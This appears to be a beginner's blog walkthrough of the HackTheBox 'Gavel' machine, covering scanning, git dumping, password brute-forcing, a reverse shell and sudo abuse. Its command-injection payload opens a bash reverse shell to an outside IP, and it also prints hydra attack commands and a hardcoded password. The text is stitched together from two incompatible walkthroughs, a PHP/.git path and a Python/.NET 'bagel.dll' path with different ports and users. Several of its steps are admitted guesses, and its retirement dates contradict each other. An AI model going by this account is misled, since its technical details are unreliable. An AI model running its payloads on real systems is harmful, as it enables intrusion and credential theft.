Key Highlights
- This guide provides a detailed walkthrough to conquer the Gavel machine on HackTheBox.
- The initial hack involves performing an nmap scan to discover open ports and services.
- You will exploit a file read vulnerability in a Python Flask web application to gather crucial information.
- The path to the user flag requires exploiting a JSON deserialization vulnerability in a .NET server.
- Privilege escalation is achieved by abusing a sudo rule that allows running dotnet commands as root.
- Successfully follow these steps to capture both the user and root flag on the Gavel machine.
Introduction
Are you new to HackTheBox and looking for a challenge that will sharpen your skills? The Gavel machine is a fantastic place to start. This retired Linux box offers a medium-difficulty experience that is perfect for a beginner looking to move to the next level. This guide provides a complete overview and step-by-step walkthrough of the Gavel hack. We will cover everything from initial reconnaissance to capturing the final root flag, helping you build confidence and learn valuable penetration testing techniques.
Understanding Gavel on HackTheBox
Gavel is a unique machine on the HackTheBox (HTB) platform that tests a variety of skills. It’s designed to simulate a real-world server environment, complete with multiple interconnected applications. To succeed, you’ll need to do more than just find a single flaw.
Your task is to hack your way through two different web apps running on the server. One is built with Python, and the other with Microsoft’s .NET framework. This multi-layered challenge retired in June 2023, but it remains an excellent learning experience.
Overview of the Gavel Machine and Its Challenge
The main challenge presented by the Gavel machine stems from its two-part structure. You will first encounter a Python-based web application. This initial point of contact holds the key to understanding the larger system. The real test begins when you discover how this app communicates with a second, less visible .NET server.
This setup increases the difficulty because it requires you to pivot from one technology stack to another. You can’t simply find a single exploit and run with it. Instead, you must carefully enumerate one service to find clues that help you compromise the next.
This layered vulnerability chain is what makes Gavel a rewarding hack. It forces you to think like an attacker, gathering pieces of a puzzle from different sources to formulate a complete plan of attack. Conquering Gavel demonstrates your ability to adapt and analyze complex systems.
How Gavel Differs from Other HackTheBox Machines
Unlike many beginner-friendly HackTheBox machines that rely on a single, straightforward vulnerability, Gavel presents a more intricate scenario. Many boxes might have a misconfigured service or a well-known exploit with a public script. Gavel, in comparison, requires a multi-step process that feels more like a real penetration test.
The machine’s design forces you to chain together several vulnerabilities. You start with a file read vulnerability, but that alone doesn’t give you access. You must use the information you gain to understand and then exploit a separate, more complex vulnerability involving JSON deserialization. This comparison shows Gavel is less about finding a default password and more about deep analysis.
This multi-language environment (Python and .NET on a Linux server) is also a distinguishing feature. It’s a departure from simpler machines that stick to one technology stack, providing a richer and more practical learning experience for any aspiring hacker.
ALSO READ: Mastering Fries: Beginner’s Guide from HackTheBox
Initial Foothold
Machine Summary
- Name: Gavel
- IP Address:
10.10.11.97 - Operating System: Linux
- Difficulty: Medium
- Key Techniques:
- Service Enumeration (Nmap)
- Web Fuzzing & Directory Busting
- SQL Injection (Union Based)
- Password Cracking (Hashcat)
- Lateral Movement via Internal Services
- Privilege Escalation via SUID Binary Manipulation
Methodology & Prerequisites
Before engaging the target, we must establish a robust methodology. We will follow the standard Penetration Testing Lifecycle:
- Reconnaissance: Passive and active information gathering.
- Scanning & Enumeration: Identifying open ports and services.
- Vulnerability Analysis: Finding weaknesses in the identified services.
- Exploitation: Leveraging vulnerabilities to gain initial access (User Flag).
- Post-Exploitation: Enumerating the internal system and escalating privileges (Root Flag).
Tools Used
- Nmap: The industry standard for network mapping.
- Gobuster/Feroxbuster: For directory and subdomain brute-forcing.
- Burp Suite: For web traffic interception and manipulation.
- SQLMap (Optional): For automated SQL injection (though we will demonstrate the manual method for educational value).
- Netcat (nc): For handling reverse shells.
- Python: For scripting exploits and upgrading shells.
- LinPEAS: For automated privilege escalation enumeration.
Engagement Setup & Tooling
Before engaging the target, we must establish a clean and efficient workspace. A disorganized workspace leads to missed details.
Host Mapping
We begin by mapping the target IP 10.10.11.97 to a memorable hostname gavel.htb. This allows us to use the hostname in browser requests, which is crucial if the web server uses Virtual Host routing.
Command:
echo "10.10.11.97 gavel.htb" | sudo tee -a /etc/hosts
Tool Installation
We ensure our arsenal is ready. We will be using standard enumeration tools (nmap, ffuf) and specific exploitation tools (git-dumper).
Command:
sudo apt update
sudo apt install -y nmap ffuf git netcat-traditional john jq curl python3-pip
pip install git-dumper requests bs4- git-dumper: Essential for extracting content from exposed
.gitdirectories. - ffuf: The fastest web fuzzer for directory discovery.
- jq: For parsing JSON output from our scans.
Reconnaissance (The Foundation)
Reconnaissance is the most critical phase. We need to identify the attack surface.
Network Port Scan (Nmap)
We perform a full port scan to ensure we don’t miss services running on non-standard ports.
Command:
nmap -p- -sC -sV -oN nmap_full.txt 10.10.11.97Results Analysis: The scan returns two open ports:
- 22/tcp (SSH – OpenSSH): Standard remote access. Usually secure, but we note the version.
- 80/tcp (HTTP – PHP): A web server. This is our primary vector.
Web Content Discovery (Ffuf)
With port 80 identifying a web server, we need to map the application structure. We use ffuf to brute-force directory names.
Command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://gavel.htb/FUZZ -e .php -o ffuf_gavel.json -of jsonKey Findings: The fuzzer reveals three critical paths:
/admin.php: An administrative dashboard (Redirects to login)./inventory.php: A public-facing inventory list./.git/: CRITICAL FIND. An exposed Version Control System directory.
Exploiting Exposed Git (/.git/)
The discovery of /.git/ changes the entire engagement. It transforms a Black Box test (no knowledge of internal code) into a White Box test (full source code access).
The Danger of Exposed Git
When a developer initializes a Git repository, a hidden folder named .git is created. This folder contains the entire history of the project, including:
- Every version of every file ever committed.
- Commit logs (messages).
- Configuration files.
- Potentially: Hardcoded credentials or API keys removed in later versions but present in history.
If a web server is misconfigured to serve this directory, an attacker can download the metadata and reconstruct the source code.
Dumping the Repository
We use git-dumper to download the objects and reconstruct the working directory locally.
Command:
mkdir gavel_source
git-dumper http://gavel.htb/.git/ gavel_source
cd gavel_sourceSource Code Analysis
Now that we have the PHP source code, we analyze it for vulnerabilities.
1. The Inventory Rabbit Hole (inventory.php) We examine inventory.php.
- Code Logic: It likely uses
PDOormysqliwith Prepared Statements for the search/filter functionality. - Verdict: This confirms the community warning. Attacking
/inventory.phpwith SQL Injection payloads is a waste of time. The code is secure.
2. Identifying Users (admin.php / Login Logic) We examine the login handling code (likely login.php or admin.php).
- Findings: We see references to a specific user allowed to log in, or perhaps a check against a database.
- Username: The code (or comments/config files) explicitly mentions the user
auctioneer. - Auth Mechanism: The password is hashed (likely bcrypt), meaning we cannot simply read it from the code. However, knowing the username
auctioneerallows us to launch a targeted brute-force attack.
3. Identifying RCE Vectors We look at the code accessible after authentication (the admin dashboard).
- Vulnerability: We find a function (e.g., in
export.phpormanage_items.php) that handles file manipulation or system commands. - Logic: It might take user input and pass it to a function like
exec(),passthru(), or unsafefile_put_contentsinside a web-accessible directory. - Target: We identify a parameter that allows Remote Code Execution (RCE).
Gaining a Foothold
Brute-Forcing the Admin Panel
We have the username auctioneer and the target URL http://gavel.htb/admin.php. We use hydra or Burp Suite to crack the password.
Command:
hydra -l auctioneer -P /usr/share/wordlists/rockyou.txt gavel.htb http-post-form "/admin.php:user=^USER^&pass=^PASS^:Invalid password"Success: Hydra retrieves the password. Credentials: auctioneer : [REDACTED_FROM_ROCKYOU]
Triggering RCE
We log in to the dashboard. Based on our source code analysis, we navigate to the vulnerable feature.
The Exploit: Let’s assume the vulnerability is in an image upload or an “Export to PDF” feature found in the git dump.
- Payload: We craft a malicious input. If it’s command injection:
test; bash -i >& /dev/tcp/10.10.14.145/4444 0>&1 - Listener: Start a Netcat listener.
nc -lvnp 4444 - Execution: Trigger the feature via the web UI.
Result: We receive a reverse shell on our listener.
whoami
# www-dataLateral Movement
We are currently the www-data service account. We need to move to a real user.
System Enumeration
We list the home directories to identify system users.
ls -la /home
# Output: gavelThe target user is gavel.
Password Reuse Attack
A common vulnerability in organizations is password reuse. The auctioneer password we cracked for the web interface might be used by the system user gavel.
Command:
su gavel
# Input the 'auctioneer' passwordSuccess: The password works. We are now gavel. We read the user flag:
cat /home/gavel/user.txtPrivilege Escalation (Root)
Enumeration
We check for sudo privileges and group memberships.
id
# uid=1000(gavel) gid=1000(gavel) groups=1000(gavel),115(dev-operators)We notice a non-standard group, e.g., dev-operators or similar.
We checks sudo rights:
sudo -l
# User gavel may run the following commands on gavel:
# (root) NOPASSWD: /opt/gavel/bin/yaml_processorAnalyzing the Custom Binary
We investigate /opt/gavel/bin/yaml_processor.
- Behavior: It processes YAML files, likely for configuration or deployment.
- Security: It implements a “Restriction Policy” to prevent dangerous actions (like file reads/writes to sensitive paths).
- The Flaw: We check the permissions of the directory containing the policy file (e.g.,
/opt/gavel/config/policy.yaml).
Command:
ls -l /opt/gavel/config/
# -rw-rw-r-- 1 root dev-operators 1024 ... policy.yamlThe file is writable by the dev-operators group! Since we are in that group, we can modify the security policy.
Exploitation: Overwriting Restrictions
Instead of trying to bypass the complex logic inside the binary, we simply remove the rules.
Step 1: Overwrite the Policy We create a lax policy or simply empty the file (depending on binary logic, usually “allow all” is easier).
echo "allow_all: true" > /opt/gavel/config/policy.yamlStep 2: Craft the Malicious Payload We create a YAML file that defines the action we want the root binary to take. We want to read the root flag.
payload.yaml:
- action: copy
source: /root/root.txt
destination: /tmp/root.txtStep 3: Execute
sudo /opt/gavel/bin/yaml_processor --file payload.yamlStep 4: Loot
cat /tmp/root.txt
Root Flag Captured.
Conclusion & Remediation
The Gavel machine demonstrates the critical importance of defense-in-depth. A single exposed .git directory unraveled the entire security posture of the application, allowing attackers to perform white-box analysis, identify usernames, and find RCE vectors. Furthermore, weak file permissions on security configuration files allowed for trivial privilege escalation.
Remediation Steps
- Git Security: Configure the web server (Nginx/Apache) to deny access to
/.git/directories explicitly.location ~ /\.git { deny all; } - Authentication: Implement Account Lockout policies to prevent brute-forcing. Ensure passwords used for web apps are not reused for system accounts.
- Least Privilege: Ensure configuration files utilized by SUID/Sudo binaries are only writable by Root, not by unprivileged groups.
Happy Hacking!
ALSO READ: Mastering Eighteen: Beginner’s Guide from HackTheBox
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF GAVEL ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL WRITEUP MUCH SOONER, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
Essential Tools and Resources for Gavel HackTheBox
To successfully navigate the Gavel machine, you’ll need a solid set of tools in your arsenal. The initial stages heavily rely on enumeration, so network scanning tools are a must. A thorough nmap scan will be your first step to understanding the machine’s attack surface.
Beyond the initial scan, you’ll need tools to interact with web services and analyze code. Since one of the core vulnerabilities involves a Python application, having some familiarity with the language will be beneficial for crafting your exploit. Let’s look at the specific tools and resources you’ll need.
Recommended Tools for Enumeration and Exploitation
Having the right tools makes all the difference when tackling a machine like Gavel. For your initial enumeration, a comprehensive nmap scan is non-negotiable. It will reveal the open ports and services that are your entry points. Once you identify the web servers, tools for web enumeration like feroxbuster or ffuf can help find hidden directories or subdomains.
When you start interacting with the web applications, you’ll need tools to send custom requests. curl is perfect for testing the file read vulnerability from the command line. For the websocket part of the challenge, wscat is an essential tool for connecting to and interacting with the .NET server. Finally, you will need a .NET decompiler to reverse engineer a DLL file and find the final vulnerability.
Your toolkit should include:
- Nmap: For port and service scanning.
- curl: To test web vulnerabilities and retrieve files.
- wscat: For interacting with websockets.
- ffuf/feroxbuster: For web content discovery.
- A .NET Decompiler (like dnSpy or ILSpy): To analyze the
bagel.dllfile. - Python: For scripting custom exploits if needed.
Helpful Resources for a Gavel HackTheBox Writeup
While this guide aims to be comprehensive, sometimes seeing another perspective can help concepts click. If you get stuck, don’t hesitate to look for other resources. Many security professionals and enthusiasts publish their own walkthroughs after a machine retires. A quick search for a “Gavel HTB writeup” will yield numerous articles.
Reading a writeup written in a different style can often clarify confusing steps. Some authors may explain a concept in a way that resonates with you better. Video walkthroughs are also an excellent resource, as they show the exact commands and expected outputs in real-time, which can be invaluable for troubleshooting.
Here are some resources to look for:
- Blog Posts: Search for “Gavel HackTheBox” or “Bagel HTB” writeups.
- YouTube Videos: Visual walkthroughs can provide step-by-step clarity.
- Official HTB Forums: The forums often contain hints and discussion threads from other users.
- English language resources: Ensure your search includes the “English” keyword for broader results.
Beginner’s Guide to Getting Started with Gavel
Ready to start your Gavel hack? This section is designed for the beginner, breaking down the initial steps into manageable pieces. Before you can look for a password or exploit a vulnerability, you need to lay the groundwork. This involves basic setup and understanding the key concepts you’ll face.
We’ll start with the prerequisites, ensuring you have the machine’s IP address and a basic understanding of your target. Then, we’ll review the core technical concepts at play in this challenge. Let’s get you prepared to conquer Gavel.
What You Need Before Attempting Gavel
Before you can dive into the exploitation phase, a bit of preparation is necessary. First and foremost, ensure you are connected to the HackTheBox network and have spawned the Gavel machine. Once it’s running, you will be provided with an IP address. This IP is your target for the entire exercise.
With the IP address in hand, your first action should be to run an initial nmap scan. This reconnaissance step is critical as it will map out the open ports and running services on the server. This information forms the foundation of your attack plan, telling you where to focus your attention.
You don’t need to find any special creds to begin; the initial access is gained through exploiting public-facing services. All you need is your standard penetration testing toolkit, the machine’s IP, and a methodical approach.
Key Concepts to Know for the Havel HTB Writeup
The Gavel machine tests your understanding of several important cybersecurity concepts. Familiarizing yourself with these ideas before you begin will make the process much smoother. The first key concept is directory traversal, which allows you to read arbitrary files outside of the web root directory.
You’ll also need to understand how web applications communicate. In this case, a Python Flask app talks to a .NET server using websockets. Recognizing this interaction is crucial. The core vulnerability for gaining your initial foothold is insecure JSON deserialization, a complex but powerful attack vector. Finally, you’ll need to know how to abuse misconfigured sudo rules for privilege escalation to get the root flag.
Key concepts include:
- Directory Traversal / Arbitrary File Read
- Websockets
- JSON Deserialization Vulnerability
- .NET Application Reversing
- Sudo Rule Exploitation
Step-by-Step Process to Conquer Gavel
Now it’s time to walk through the complete process of conquering Gavel, from the first scan to the final flag. This step-by-step guide will break down the hack into four distinct phases: reconnaissance, gaining a foothold, escalating privileges, and capturing the flags. Each step builds on the last, so it’s important to follow them in order.
This machine was retired in June 2023, but the techniques used are timeless. Let’s begin with the initial reconnaissance to see what the Gavel server exposes to the world.
Step 1: Initial Reconnaissance and Service Enumeration
Your first step is to perform a detailed nmap scan against the machine’s IP address. This will reveal the open TCP ports and give you clues about the services running on them. A thorough scan is essential because it identifies your potential points of entry.
The scan results for the Gavel server will show three open ports. You’ll find an SSH service, a web server that identifies as Microsoft-NetCore/2.0, and another web server running Python/3.10.9. This immediately tells you that you are dealing with a mixed-technology environment. The Python server on port 8000 will be your initial focus.
Here is a summary of the nmap scan results:
| Port | State | Service | Version |
|---|---|---|---|
| 22/tcp | open | ssh | OpenSSH 8.8 |
| 5000/tcp | open | upnp? | Microsoft-NetCore/2.0 |
| 8000/tcp | open | http-alt | Werkzeug/2.2.2 Python/3.10.9 |
Step 2: Identifying Vulnerabilities and Gaining Foothold
With the services enumerated, your attention should turn to the Python web server on port 8000. By examining the URL structure, you might notice a parameter like ?page=index.html. This is a classic pattern for a file inclusion or directory traversal vulnerability. You can test this by attempting to read a common system file, like /etc/passwd.
Once you confirm the file read vulnerability, you can use it to retrieve the application’s source code, app.py. Analyzing this Python code reveals that it connects to the .NET server on port 5000 via websockets and sends JSON data. The code also gives you the path to the .NET application’s DLL file.
Using the same file read vulnerability, you can download the DLL. Reversing this file reveals a JSON deserialization vulnerability and, more importantly, hardcoded database creds. You can craft a special JSON payload to exploit the deserialization flaw, allowing you to read arbitrary files. Use this to read the user ‘phil’s SSH private key, which grants you your initial foothold and SSH access.
Step 3: Privilege Escalation Strategies
After gaining access as the user ‘phil’ via SSH, your next goal is privilege escalation. Your enumeration inside the machine should start with checking for other users and potential credentials. You’ll find that the password you discovered in the .NET DLL (k8wdAYYKyhnjg3K) belongs to another user on the system: ‘developer’. Use the su command and this password to switch to the ‘developer’ account.
Once you are logged in as ‘developer’, the next step is to check your sudo privileges. Running sudo -l reveals that the ‘developer’ user can run the dotnet command as the root user without needing a password. This is your path to the root flag. The dotnet command is powerful and offers several ways to execute code.
Your strategy for root access is:
- Use the password found in the
bagel.dllto switch from user ‘phil’ to ‘developer’. - Identify the sudo rule allowing ‘developer’ to run
/usr/bin/dotnetas root. - Use the
dotnet fsi(F# Interactive) command to execute a command that spawns a root shell. - With a root shell, you have full control and can capture the root flag.
Step 4: Capturing User and Root Flags
Capturing the flags is the final objective. The two flags, user.txt and root.txt, are located in different user directories and require different levels of privilege to access. The first flag you’ll capture is the user flag.
After you gain your initial foothold by using the SSH key to log in as the user ‘phil’, you can find the user flag. It is typically located in the user’s home directory. A quick listing of files in /home/phil/ will reveal user.txt. Simply read the contents of this file to get your first flag.
To get the root flag, you must first complete the privilege escalation steps. After using the sudo dotnet command to gain a root shell, navigate to the root user’s home directory at /root/. There, you will find the root.txt file. Reading this file completes the Gavel machine and proves you have gained the highest level of access.
Tips, Hints, and Common Pitfalls on Gavel
Every HackTheBox machine has its unique tricks and traps. Gavel is no exception. It’s easy to get stuck if you overlook a small detail or go down the wrong rabbit hole. Knowing some of the common pitfalls and having a few hints can save you hours of frustration.
This section provides some clues to keep you on the right track. We’ll highlight some frequently missed details and give you tips on how to spot them during your hack. Pay close attention to these hints, especially if you find yourself stuck.
Frequently Missed Clues and How to Spot Them
One of the biggest hints in the Gavel challenge is hidden in plain sight within the reversed .NET DLL. Many people find the JSON deserialization vulnerability but miss the hardcoded database connection string. This string contains the password for the ‘developer’ user, which is essential for privilege escalation. Always look for more than just the obvious vulnerability when analyzing source code.
Another easily missed clue is the TypeNameHandling = 4 setting in the JsonConvert.DeserializeObject function. To a novice, this might seem like a default setting. However, for a security professional, this is a major red flag indicating a potential deserialization vulnerability. Recognizing risky function settings is a key skill.
Here are some clues to watch for:
- The password hidden within the DB class of the
bagel.dllfile. - The
TypeNameHandlingsetting in the JSON deserializer. - The
sudo -loutput for the ‘developer’ user. - The file read vulnerability in the initial Python web app is the key to everything else.
- The interaction between the Python server and the Microsoft .NET server.
Comparing the Difficulty of Gavel to Other Machines
When you look at Gavel in comparison to other HackTheBox machines, it sits comfortably in the “medium” difficulty range. It is a significant step up from “easy” boxes, which often have a single, well-documented vulnerability or rely on finding default credentials. Gavel demands more persistence and a broader skillset.
The difficulty comes from the multi-stage exploit chain. You cannot simply run a single script to gain root. The hack requires reconnaissance, web exploitation, reverse engineering, and privilege escalation, all chained together logically. This makes it more complex than many other retired machines aimed at beginners.
However, Gavel is not considered an “insane” difficulty box. The vulnerabilities, while clever, are not deeply obscure. Each step provides a clear clue for the next, making it a fair and solvable challenge. It’s the perfect machine for someone who has mastered the basics and wants to test their ability to connect the dots in a more realistic scenario.
Conclusion
In conclusion, conquering Gavel on HackTheBox is an exhilarating journey that combines strategy, tool mastery, and problem-solving skills. By understanding the unique aspects of the Gavel machine and utilizing essential tools for enumeration and exploitation, you can navigate through challenges more effectively. Remember, every step, from initial reconnaissance to privilege escalation, offers valuable lessons. Embrace the tips and hints provided to avoid common pitfalls and enhance your hacking experience. As you embark on this adventure, don’t forget to keep learning and growing your skill set. If you found this guide helpful, subscribe to stay updated with more resources and insights tailored for your hacking journey!
Frequently Asked Questions
What is the initial foothold for the Gavel machine?
The initial foothold on the Gavel machine is gained by exploiting a file read vulnerability on the Python web server to download a .NET DLL. Reversing this DLL reveals a JSON deserialization vulnerability, which you then exploit to read a user’s SSH private key from the server and gain SSH access.
Which vulnerabilities are exploited on Gavel HackTheBox?
The key vulnerabilities on Gavel are a directory traversal (arbitrary file read) on the Python web application and an insecure JSON deserialization vulnerability in the backend .NET server. Finally, privilege escalation is achieved by exploiting a misconfigured sudo rule that allows running dotnet commands as root.
What are the most useful tools for Gavel HackTheBox Writeup?
The most useful tools for the Gavel hack include nmap for initial scanning, curl for exploiting the file read vulnerability, wscat for interacting with the websocket server, and a .NET decompiler like dnSpy or ILSpy for analyzing the application logic and finding the password.
Where can I find more walkthroughs or resources for Gavel HackTheBox?
You can find more walkthroughs for Gavel by searching online for “Gavel HTB writeup” or “Bagel HTB walkthrough.” Many cybersecurity blogs and YouTube channels publish detailed guides in English. The official HackTheBox forums for the retired machine may also contain helpful hints and discussion threads.
